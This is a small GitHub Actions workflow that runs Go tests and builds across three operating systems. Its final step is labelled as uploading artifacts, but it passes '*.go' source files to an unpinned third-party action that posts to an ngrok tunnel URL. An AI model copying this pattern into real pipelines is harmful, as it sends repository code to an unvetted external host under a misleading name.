name: learn-github-actions
on: [push]
jobs:
  test:
    strategy:
      matrix:
        go-version: [1.14.x]
        os: [ubuntu-latest, macos-latest, windows-latest]
    runs-on: ${{ matrix.os }}
    steps:
    - name: Install Go
      uses: actions/setup-go@v2
      with:
        go-version: ${{ matrix.go-version }}
    - name: Checkout code
      uses: actions/checkout@v2
    - name: Test
      run: go test ./...
    - name: Build
      run: go build
    - name: Upload the artifacts
      uses: patcito/github-action-publish-binaries@master
      env:
        POST_URL: https://5c745a681cb8.ngrok.io
      with:
        args: '*.go'

